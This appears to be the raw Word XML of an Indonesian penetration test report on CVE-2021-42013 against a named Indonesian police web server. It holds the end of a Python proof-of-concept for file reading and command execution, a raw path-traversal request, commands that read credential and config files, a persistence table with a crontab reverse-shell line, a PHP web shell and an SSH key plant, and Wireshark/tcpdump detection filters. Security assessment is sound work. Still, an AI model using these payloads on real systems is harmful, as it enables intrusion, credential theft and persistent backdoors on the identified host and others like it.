    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2377FDE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return resp.text.strip()</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="465A9D5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return None</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="61965C7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4888C63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if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="20632CFE" wp14:textId="5C1B695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print(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'[*] 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42013 PoC')</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="46DE91A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print('[*] Reading /etc/passwd...')</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="172272F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result = read_file('/etc/passwd')</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="65D5A72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if result:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="045C265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print('[+] SUCCESS:', result[:100])</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4F878F5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print('[*] Executing id command...')</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0B07B8C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output = rce('id')</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3AB9EC1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if output:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3229A22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print('[+] RCE SUCCESS:', output)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="637805D2" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3EF6C89C" wp14:textId="0C56C2FC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12.3 File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File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Sensitif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Lain via RCE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2FF5807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Baca konfigurasi database (kemungkinan berisi kredensial):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="183C5A8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POST /icons/[payload]/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0F727EC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cat /var/www/html/config.php</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="08F2FFC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cat /var/www/html/.env</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="29D08FC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cat /var/www/html/application/config/database.php</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4467701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316A154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Enumerate network:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6FCA507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POST /icons/[payload]/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1C676756" wp14:textId="2AEAA4CA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netstat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tulpn</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3D7AC70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cat /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="588922B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ip addr show</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0D3E0D84" wp14:textId="0CF2446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arp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</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="762EAA3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540177F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Lihat proses berjalan:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="690A8C3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POST /icons/[payload]/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6104471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ps aux</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="33D127F5" wp14:textId="6481E9C8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ls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la /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="379F4B0D" wp14:textId="354C2A22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find /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perm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4000 2&gt;/dev/null   # Cari SUID binaries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untuk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privesc</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="463F29E8" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="07CF5A14" wp14:textId="6F2955A5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="14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>13. Post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>Exploitation &amp; Lateral Movement Analysis</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="386BAB0B" wp14:textId="79D81126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Analisis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post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exploitation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berikut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dilakukan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lingkup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terbatas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keperluan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pembuktian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penilaian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risiko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Tidak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ada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tindakan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destruktif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modifikasi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data,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atau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penanaman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persistence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dilakukan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7AB836E6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13.1 Privilege Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7CA85B0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Konfirmasi user context:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="49C7794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$ id</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2D9663E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uid=1(daemon) gid=1(daemon) groups=1(daemon)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="16E6644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015D52A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Verifikasi OS dan kernel:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="36A333B8" wp14:textId="71403E23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$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uname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</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7301E2D8" wp14:textId="590BA1BC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Linux server.polri.go.id 3.10.0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1160.el7.x86_64 #1 SMP</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6952FF0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Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7DE1359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47740896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Cek capabilities daemon user:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0DE1454E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$ cat /proc/1/status | grep Cap</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3A202D5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CapInh: 0000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6E610AB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CapPrm: 0000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="32BCD7F0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CapEff: 0000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6EBA70B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5BE5CC8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Potensi privilege escalation:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0B4BD9B0" wp14:textId="0D4BA7B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$ find /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perm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4000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type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0D2A8A3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/usr/bin/sudo</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="003F7AC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/usr/bin/passwd</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0F66366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/usr/bin/chfn</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="413F905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/usr/bin/newgrp</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2A534C7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/usr/sbin/unix_chkpwd</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3B7B4B86" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="128EC686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13.2 Network Lateral Movement Analysis</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="73EBB7F5" wp14:textId="0F534A3F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Internal Network Discovery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Dari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akses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daemon, attacker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dapat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melakukan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scanning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terhadap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jaringan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internal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biasanya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tidak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terjangkau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dari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internet</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="00E581BA" wp14:textId="75AD78B9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Database Access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Jika server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menjalankan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MySQL/PostgreSQL,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kredensial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dalam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config file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dapat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dimanfaatkan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untuk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mengakses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database internal</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="58F2BAE4" wp14:textId="5CF8980B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SSH Key Harvesting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File ~/.ssh/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id_rsa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dari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akun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akun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aktif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(infra,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admdumas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dll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.)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dapat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dicuri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untuk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akses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sistem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lain</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1D2CE53B" wp14:textId="39B62DF7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Service Account Abuse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Webuzo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adalah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panel hosting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akun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ini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kemungkinan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memiliki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akses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multiple virtual hosts dan database</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3A0FF5F2" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="78A97081" wp14:textId="421E6C12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13.3 Persistence Techniques (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Teoritis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Tidak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Dilakukan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CFFFFC7" w14:paraId="377FB7C2" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D68910" w:sz="8"/>
              <w:left w:val="single" w:color="D68910" w:sz="8"/>
              <w:bottom w:val="single" w:color="D68910" w:sz="8"/>
              <w:right w:val="single" w:color="D68910" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FEF9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64443" wp14:textId="77777777">
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="D68910"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CATATAN: Bagian ini bersifat teoritis semata untuk keperluan risk assessment. Tidak ada teknik persistence yang diterapkan pada target aktual.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5630AD66" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="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 xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="04342E6C" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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68E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Teknik Persistence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B5E0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Metode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4DAD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Deteksi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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DB01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</w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="3780743C" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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890A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Crontab backdoor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BC72" wp14:textId="699B1028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echo '*/5 * * * * /bin/bash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i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&gt;&amp; /dev/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tcp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/IP/PORT 0&gt;&amp;1' | crontab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u daemon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D42B" wp14:textId="1605F346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crontab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l; /var/spool/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cron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/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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6F4C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3CFFFFC7" w14:paraId="7BB4932A" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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F66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Web shell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5A7B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echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; /var/www/html/update.php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D372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File integrity monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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364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</w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="5713F5A0" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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74F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SSH authorized_keys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1335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echo 'ATTACKER_PUBKEY' &gt;&gt; /home/infra/.ssh/authorized_keys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D093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auth.log, .ssh/authorized_keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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AF7A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</w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="31B0026A" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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A215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LD_PRELOAD rootkit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3AF5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Compile malicious .so, set LD_PRELOAD environment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211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ldd output, /proc/maps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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D0A6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</w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="75996D1A" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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C2AF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Cron via Apache config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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60F6" wp14:textId="52644DE1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AddHandler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cgi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script .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php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; add malicious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cgi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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2CAC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httpd.conf monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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426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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="61829076" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="61BEF6E4" wp14:textId="43D39500">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="14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14. Network Traffic Analysis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 xml:space="preserve"> Wireshark /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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcpdump</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6DB1F4B2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Analisis traffic jaringan dilakukan untuk mendokumentasikan pola serangan dari perspektif jaringan, membantu defender membangun signature IDS/IPS yang efektif.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2B581D53" wp14:textId="76FC371C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14.1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Karakteristik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Traffic CVE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2021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42013</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="30A31CDA" wp14:textId="03C22A7D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Protocol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HTTP/1.1 (plaintext)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tidak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terenkripsi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mudah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di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inspect</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="25570751" wp14:textId="6A4EF407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Port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8080/TCP pada target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ini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umumnya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80/TCP</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="010348A7" wp14:textId="588AA38F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Method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GET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untuk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path traversal (file read), POST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untuk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RCE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="263C4125" wp14:textId="72B82C3F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URI Pattern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Mengandung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%% (double percent sign)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berulang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dalam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path</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="639CC093" wp14:textId="3DCF5A43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User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Agent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Dapat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bervariasi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; attacker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canggih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akan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menyamarkan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UA</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7B6FB720" wp14:textId="4FAA6F5C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Request Size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Relatif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besar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untuk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GET request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karena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panjang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payload URL</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7589FF29" wp14:textId="646ECEAE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Response Code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200 OK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untuk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eksploitasi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berhasil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; 400/403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untuk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gagal</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2BA226A1" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="599C8F7D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14.2 Wireshark Filter untuk Deteksi</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4E2411E3" wp14:textId="18E20A1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Filter Wireshark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deteksi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42013:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3F2CD05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5438390C" wp14:textId="5CDA5E7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Filter 1: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Deteksi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double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percent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dalam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URI</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5CF60B4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http.request.uri contains "%%32" or http.request.uri contains "%%65"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7212115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24F327C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Filter 2: Deteksi akses ke path sensitif via traversal</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="47FE7F6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http.request.uri contains "etc/passwd" or http.request.uri contains "/bin/sh"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="32D65AF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03B8E089" wp14:textId="515C0A5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Filter 3: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Gabungan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komprehensif</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="19E30CF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(http.request.uri contains "%%32%65") or</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4069DE8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(http.request.uri contains "%2e%2e") or</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5DD49ED8" wp14:textId="6DEE8070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http.request.uri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matches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".*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%25[0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9a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fA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F][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9a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fA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].*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")</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="09845CE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6204F77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Filter 4: Hanya POST ke /bin/sh (RCE attempt)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5C79CC1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http.request.method == "POST" and http.request.uri contains "bin/sh"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3AA4ADE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3B700F1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tcpdump equivalent:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5DAD0B0D" wp14:textId="28D593C3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tcpdump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eth0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 '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tcp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port 8080 and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tcp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[((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tcp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[12:1] &amp; 0xf0) &gt;&gt; 2):4] = 0x47455420)'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2AE69349" wp14:textId="5C400AD8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Kemudian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grep: | grep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'%%32\|%2e%2e\|/bin/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sh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'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="17AD93B2" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="418737A9" wp14:textId="4E262C32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14.3 Sample Packet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 Path Traversal Request</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="127115A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Raw HTTP request dari Wireshark packet capture:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="77ABD30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3700AB7E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Frame 1247: 621 bytes on wire</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7F0BEB5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Ethernet II: Src: [REDACTED] → Dst: [SERVER_MAC]</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7FDE83B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Internet Protocol: Src: [ATTACKER_IP] → Dst: [SERVER_IP]</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1E8584A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Transmission Control Protocol: Src Port: 52341 → Dst Port: 8080</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0C9381D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65A2EBEE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Hypertext Transfer Protocol:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="29A3B5F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GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="000E700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%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="798C157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etc/passwd HTTP/1.1\r\n</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="47F777BE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Host: dumaspresisi.itwasum.polri.go.id:8080\r\n</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="24B738AF" wp14:textId="7DE5780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User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Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.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0)\r\n</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="785A03D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Connection: close\r\n</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0B029E3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\r\n</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5DD4664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706853F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Response packet (200 OK + /etc/passwd content)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="68F5D24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Frame 1248: 2041 bytes on wire</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4318DDB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HTTP/1.1 200 OK\r\n</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="06CA0F24" wp14:textId="260EBE0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Length: 1820\r\n</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6C84AD8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[passwd content follows...]</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0DE4B5B7" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="689AB821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15. Defensive Evasion Analysis</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7B626417" wp14:textId="77777777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Memahami bagaimana attacker dapat menghindari deteksi adalah komponen penting dari defensive security. Berikut adalah analisis teknik evasion yang mungkin digunakan terhadap kerentanan ini.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="17253261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15.1 Teknik Evasion yang Mungkin Digunakan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 xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="6DB50A1B" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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2BFC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Teknik Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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D597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Deskripsi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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078A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Cara Deteksi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="42FAD776" wp14:textId="77777777">
